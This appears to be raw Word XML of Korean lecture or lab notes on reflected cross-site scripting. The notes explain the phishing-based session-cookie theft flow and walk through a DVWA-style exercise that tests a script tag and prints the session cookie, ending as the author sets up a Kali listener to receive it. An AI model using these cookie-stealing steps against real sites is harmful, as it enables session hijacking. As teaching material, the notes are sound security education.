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04DFB" w14:textId="02C8D2A6" w:rsidR="0063084A" w:rsidRDefault="00911FCE" w:rsidP="00911FCE">
      <w:pPr>
        <w:spacing w:after="0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크로스 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCCE2A6" w14:textId="584AFF74" w:rsidR="00911FCE" w:rsidRDefault="00182C61" w:rsidP="00911FCE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- 공격자가 악의적인 스크립트 코드를 웹 애플리케이션에 삽입한 후, 웹 사용자의 웹 브라우저에서 해당 코드가 실행되도록 만드는 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63519DA6" w14:textId="2C11A843" w:rsidR="00182C61" w:rsidRDefault="00182C61" w:rsidP="00911FCE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- 다른 공격들은 취약점을 가지고 있는 서버 쪽 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63585842" w14:textId="71A04205" w:rsidR="00182C61" w:rsidRDefault="00182C61" w:rsidP="00911FCE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- 이 공격은 서버의 취약점을 이용하여 클라이언트 쪽 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A60374" w14:textId="34DB510E" w:rsidR="00182C61" w:rsidRDefault="00182C61" w:rsidP="00911FCE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- 예시 중 하나로 세션 쿠키 탈취가 있음 -&gt; 웹 브라우저에 있는 세션 쿠키를 자바스크립트를 이용하여 읽음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C011158" w14:textId="6EBE84A7" w:rsidR="00182C61" w:rsidRDefault="00182C61" w:rsidP="00911FCE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- 자바스크립트 코드에 따라서 다양한 형태의 공격 시도 가능</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3159CC73" w14:textId="55338809" w:rsidR="00182C61" w:rsidRDefault="00182C61" w:rsidP="00911FCE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- 실제 취약점을 가지고 있는 웹 서버와 상관없는 웹 사이트의 정보도 노릴 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB39612" w14:textId="63D9A97A" w:rsidR="00182C61" w:rsidRDefault="00182C61" w:rsidP="00911FCE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스크립트 코드의 실행 시기에 따라 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리플렉티드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(reflected) 또는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>스토어드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(stored) 크로스 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격으로 구분할 수 있음.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4346FF7F" w14:textId="77777777" w:rsidR="00182C61" w:rsidRDefault="00182C61" w:rsidP="00911FCE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30BAEAA5" w14:textId="4800ECC7" w:rsidR="00182C61" w:rsidRDefault="00FE1F20" w:rsidP="00911FCE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1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>리플렉티드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Reflected XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00C1370D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격 개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272970E1" w14:textId="77777777" w:rsidR="00672D66" w:rsidRDefault="00C1370D" w:rsidP="000B200A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="2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</w:t>
      </w:r>
      <w:r w:rsidR="000B200A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 브라우저에 사용자가 입력한 결과가 출력되는 경우, 적절한 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000B200A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>입력값</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000B200A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 검증 또는 대응 방안이 없</w:t>
      </w:r>
      <w:r w:rsidR="00672D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FE0B27" w14:textId="4D223938" w:rsidR="00672D66" w:rsidRDefault="00672D66" w:rsidP="00672D66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220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-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="000B200A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">사용자가 &lt;script&gt;와 같은 스크립트 태그를 포함한 자바스크립트 코드를 입력 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49247F0E" w14:textId="77777777" w:rsidR="00672D66" w:rsidRDefault="000B200A" w:rsidP="00672D66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220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-&gt; 웹 페이지에 이 스크립트가 그대로 출력 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F6FE57" w14:textId="2B844B1D" w:rsidR="000B200A" w:rsidRDefault="000B200A" w:rsidP="00672D66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220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-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00672D66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>웹 브라우저는 사용자에 의해 입력된 자바스크립트와 기존 웹 애플리케이션 개발자가 의도한 자바스크립트 구별 불가</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47523513" w14:textId="2381E8A5" w:rsidR="00672D66" w:rsidRDefault="00672D66" w:rsidP="00672D66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220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-&gt; 사용자가 입력한 자바스크립트 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68137111" w14:textId="0EB73E14" w:rsidR="00672D66" w:rsidRDefault="00672D66" w:rsidP="00672D66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- 요청 메시지에 입력된 스크립트 코드가 즉시 응답 메시지를 통해 출력되는 취약점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB1C2E1" w14:textId="44272A2A" w:rsidR="00672D66" w:rsidRDefault="00672D66" w:rsidP="00672D66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- 게시판에 글을 남기거나 이메일 피싱을 이용하여 악의적인 스크립트 코드가 담긴 요청을 사용자가 실행하도록 만듦.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A8FFD" w14:textId="0E484E35" w:rsidR="00672D66" w:rsidRDefault="009E7E5E" w:rsidP="009E7E5E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7E5E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06ECFE54" wp14:editId="22C08539">
            <wp:extent cx="5359400" cy="2731420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1428102844" name="그림 1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02844" name="그림 1" descr="텍스트, 도표, 스크린샷, 라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2842" cy="273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1001" w14:textId="66E08DFD" w:rsidR="009E7E5E" w:rsidRPr="00906155" w:rsidRDefault="009E7E5E" w:rsidP="009E7E5E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906155">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;이메일 피싱 공격 예시&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD50963" w14:textId="4B47DF09" w:rsidR="00FD17D9" w:rsidRDefault="00FD17D9" w:rsidP="00FD17D9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1) 공격자가 사용자에게 이메일 등으로 피싱. (포털 사이트의 게시판, SNS 등 공격자가 링크를 남길 수 있으면 모두 가능) 피싱 시, 세션 쿠키 탈취 스크립트 코드를 삽입한 HTTP 요청 링크 포함</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607EB6B" w14:textId="4AB295FA" w:rsidR="00FD17D9" w:rsidRDefault="00FD17D9" w:rsidP="00FD17D9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2) 사용자가 링크 클릭 -&gt; 스크립트 코드가 삽입된 요청이 웹 사이트로 전송</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF7D5E0" w14:textId="7F316B2D" w:rsidR="00FD17D9" w:rsidRDefault="00FD17D9" w:rsidP="00FD17D9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3) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리플렉티드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점이 있는 웹 사이트는 입력된 스크립트를 반사하여 웹 페이지에 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF28291" w14:textId="3D1C3BE5" w:rsidR="00FD17D9" w:rsidRDefault="00FD17D9" w:rsidP="00FD17D9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4) 웹 페이지를 읽는 웹 브라우저는 자동으로 스크립트 실행 -&gt; 그 결과인 세션 쿠키를 공격자에게 전달</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379F482" w14:textId="7850E583" w:rsidR="002A404B" w:rsidRDefault="00FD17D9" w:rsidP="00FD17D9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5) 공격자가 이 세션 쿠키를 사용하여 해당 사용자의 권한으로 접속</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5281C980" w14:textId="77777777" w:rsidR="002A404B" w:rsidRDefault="002A404B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ACB6790" w14:textId="25949D35" w:rsidR="00FD17D9" w:rsidRDefault="002A404B" w:rsidP="002A404B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="100" w:left="2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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>리플렉티드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Reflected XSS) 공격 실습</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA6C35" w14:textId="5F3003D0" w:rsidR="002A404B" w:rsidRDefault="002A404B" w:rsidP="002A404B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A404B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="500F30A2" wp14:editId="2CDEF898">
            <wp:extent cx="4343400" cy="4065349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1809156261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56261" name="그림 1" descr="텍스트, 전자제품, 스크린샷,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7930" cy="406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5AC2" w14:textId="66168477" w:rsidR="002A404B" w:rsidRDefault="002A404B" w:rsidP="002A404B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center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&lt;보안 레벨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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Low /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS (Reflected)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EEA896" w14:textId="05BFE600" w:rsidR="002A404B" w:rsidRDefault="002A404B" w:rsidP="002A404B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해당 페이지는 이름을 물어보는 폼 표시</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3DBD34" w14:textId="44CC8383" w:rsidR="002A404B" w:rsidRDefault="002A404B" w:rsidP="002A404B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입력란에 이름을 입력하면 다음과 같은 문구 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068716DC" w14:textId="15BB59FE" w:rsidR="002A404B" w:rsidRDefault="002A404B" w:rsidP="002A404B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A404B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F782F27" wp14:editId="31A67EF6">
            <wp:extent cx="4923367" cy="1087600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="867363293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363293" name="그림 1" descr="텍스트, 스크린샷, 폰트, 라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140" cy="109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0385" w14:textId="10BB3799" w:rsidR="002A404B" w:rsidRDefault="002A404B" w:rsidP="002A404B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Hello 뒤에 입력 값이 그대로 다시 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9FDD38" w14:textId="3A62684B" w:rsidR="002A404B" w:rsidRDefault="002A404B" w:rsidP="002A404B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어떤 웹 애플리케이션이 사용자가 입력한 값을 그대로 출력하는 경우, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리플렉티드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점이 존재할 가능성 높음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D0C880" w14:textId="38788E01" w:rsidR="002A404B" w:rsidRDefault="002A404B" w:rsidP="002A404B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</w:t>
      </w:r>
      <w:r w:rsidR="009D0A83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>해당 취약점이 존재하는지 확인하기 가장 간단한 방법은 스크립트 태그 입력해보는 것</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24233365" w14:textId="1A2D1907" w:rsidR="009D0A83" w:rsidRDefault="009D0A83" w:rsidP="009D0A83">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0A83">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F25D4F1" wp14:editId="170619DE">
            <wp:extent cx="3843867" cy="374985"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:docPr id="103489526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8952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3508" cy="38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52BB" w14:textId="01D956D7" w:rsidR="009D0A83" w:rsidRDefault="009D0A83" w:rsidP="009D0A83">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0A83">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09E51534" wp14:editId="4DDC8063">
            <wp:extent cx="3843655" cy="1083392"/>
            <wp:effectExtent l="0" t="0" r="4445" b="2540"/>
            <wp:docPr id="191484523" name="그림 1" descr="텍스트, 스크린샷, 폰트, 멀티미디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84523" name="그림 1" descr="텍스트, 스크린샷, 폰트, 멀티미디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571" cy="108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BAEF" w14:textId="68CF36E4" w:rsidR="009D0A83" w:rsidRDefault="009D0A83" w:rsidP="009D0A83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자바스크립트 함수 alert()에 의해 1이란 입력 값 출력 -&gt; 입력한 자바스크립트가 웹 브라우저에서 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073116FA" w14:textId="2FF201D2" w:rsidR="009D0A83" w:rsidRDefault="009D0A83" w:rsidP="009D0A83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스크립트를 입력할 수 있고, 입력된 스크립트가 응답되어 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>리플렉티드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 크로스 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점이 존재한다는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9AFC0" w14:textId="6A94AF07" w:rsidR="00152476" w:rsidRDefault="00152476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50B9B66" w14:textId="1493EC31" w:rsidR="009D0A83" w:rsidRDefault="000C5481" w:rsidP="000C5481">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5481">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D8D943" wp14:editId="0A406DFC">
            <wp:extent cx="4148667" cy="343278"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="13970235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0235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659" cy="34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9DBA" w14:textId="21A53544" w:rsidR="000C5481" w:rsidRDefault="000C5481" w:rsidP="000C5481">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5481">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59F948D8" wp14:editId="1E139899">
            <wp:extent cx="4186767" cy="1330117"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="18581171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1716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1607" cy="133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30C6" w14:textId="4368BDC3" w:rsidR="000C5481" w:rsidRDefault="000C5481" w:rsidP="000C5481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스크립트를 위와 같이 입력하면, 쿠키를 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBB4A0D" w14:textId="124325FE" w:rsidR="000C5481" w:rsidRDefault="000C5481" w:rsidP="000C5481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PHPSESSID는 PHP에서 생성하는 세션 쿠키</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B16AA19" w14:textId="384D1B5A" w:rsidR="000C5481" w:rsidRDefault="000C5481" w:rsidP="000C5481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크로스 사이트 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>스크립팅</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공격은 주로 세션 쿠키를 알아내는 데 초점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E13F94" w14:textId="7F14979E" w:rsidR="000C5481" w:rsidRDefault="000C5481" w:rsidP="000C5481">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1B4C88" w14:textId="351CFDE8" w:rsidR="002875BD" w:rsidRDefault="00C37311" w:rsidP="00C37311">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37311">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3445737D" wp14:editId="139B55D9">
            <wp:extent cx="4131733" cy="600337"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1486387596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87596" name="그림 1" descr="텍스트, 폰트, 스크린샷, 그래픽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7865" cy="60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AD54" w14:textId="003077E4" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="000C5481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위의 세션 쿠키를 공격자(kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)로 전달하기 위해 웹 서버 시작</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8914A" w14:textId="77777777" w:rsidR="00C37311" w:rsidRDefault="00C37311" w:rsidP="000C5481">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:leftChars="200" w:left="440"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
